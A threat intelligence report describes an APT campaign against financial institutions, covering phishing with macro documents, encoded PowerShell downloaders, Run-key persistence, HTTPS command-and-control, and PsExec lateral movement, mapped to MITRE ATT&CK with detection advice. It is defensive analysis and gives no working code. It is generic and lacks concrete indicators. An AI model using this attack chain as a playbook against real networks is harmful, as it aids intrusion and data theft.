Comprehensive Analysis of the Latest APT Activity: Targeting Financial Institutions with Stealthy Techniques

Nina Kovacs — Exploit Research Analyst

Key Takeaways

• APT groups are increasingly leveraging sophisticated phishing techniques to initiate attacks on financial institutions.
• We identified the use of the PowerShell scripting language to establish persistence and evade detection.
• The implemented command and control infrastructure relied on HTTPS, enabling stealthy communication with compromised hosts.

Executive Summary

In our recent investigation into a targeted attack against several financial institutions, we discovered that a sophisticated actor utilized a multi-faceted approach to compromise and exfiltrate sensitive data. The attack exhibited tactics consistent with advanced persistent threats (APTs), particularly in its initial access phase, allowing the implant to maintain a foothold in the network. Throughout our analysis, we observed various MITRE ATT&CK tactics and techniques being employed to manage the operation efficiently. Each stage exhibited an evolving threat landscape that highlighted the actor’s significant capabilities and intent.

Initial Access

The initial access phase was facilitated through tailored phishing emails targeting specific employees within the institutions. Our analysis revealed that these emails contained malicious links leading to a well-constructed landing page. Here, the user was prompted to download a disguised document, which actually hosted a trojanized Microsoft Office file. Upon opening this document, macros were enabled, deploying a downloader that fetched the primary payload from a command-and-control (C2) server. The technique employed aligns with T1566 – Phishing, where initial access is achieved via deceptive communications.

Execution & Persistence

Upon successful execution of the trojanized document, the payload initiated a series of PowerShell commands that allowed the actor to download additional components silently. During our investigation, we observed the creation of the registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, establishing persistence for as long as the user profile was active. This technique correlates with T1547.001 – Registry Run Keys / Startup Folder. The implant utilized encoded PowerShell commands, obfuscating the content and avoiding detection by common security solutions.

Command and Control

Communication between the compromised hosts and the actor’s C2 infrastructure was conducted over HTTPS, camouflaging the traffic to evade traditional network detection mechanisms. Analysis of the beaconing behavior indicated periodic connections to a domain with an apparent legitimate registration, enhancing the actor’s operational security. We identified domains that had been configured to change regularly, showcasing a robust rotate pattern. The observed traffic adhered to the T1071.001 – Application Layer Protocol: Web Protocols where the hidden communication was not only stealthy but also resilient.

Lateral Movement & Discovery

Once a foothold was established, the attacker engaged in lateral movement, using SMB and WMI protocols to explore the internal network environment. Tools such as PsExec were utilized to deploy additional payloads across various endpoints. We noted the enumeration of user accounts and system information through commands like net user and systeminfo, aligning the campaign with T1087 – Account Discovery. This granted the actor further insights into the network’s architecture, enabling tailored follow-up actions.

Impact & Objectives

Ultimately, the actor aimed to exfiltrate sensitive financial data, including customer information and transaction records. The infections allowed the actor not only to steal data but also to gain considerable access rights, stressing the importance of robust insider threat protection. The primary goal was consistently observed to infiltrate the data repositories, aiming for confidentiality breaches and potential financial gain utilizing the stolen information.

MITRE ATT&CK Mapping

• T1566 – Phishing: Initial compromise through crafted emails.
• T1547.001 – Registry Run Keys / Startup Folder: Persistence established via registry modifications.
• T1071.001 – Application Layer Protocol: Web Protocols: Command and control traffic hidden under HTTPS.
• T1087 – Account Discovery: Lateral movement leveraging user account enumeration.

Detection Opportunities

• Implement monitoring for registry modifications under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run to detect persistence mechanisms.
• Review email security protocols and monitor for indicators of phishing attempts with distinct attachment types.
• Audit network traffic for unusual HTTPS connections that could signify malicious C2 communications.

Analyst Notes

This campaign highlights the resilience and sophistication level of APT actors targeting financial institutions. It underscores the necessity for vigilance against not only the technical execution of the attacks but also against social engineering tactics employed to gain initial access. Continuous enhancements in detection methodologies and response procedures are critical to counteract such evolving threats.

Source: Original Report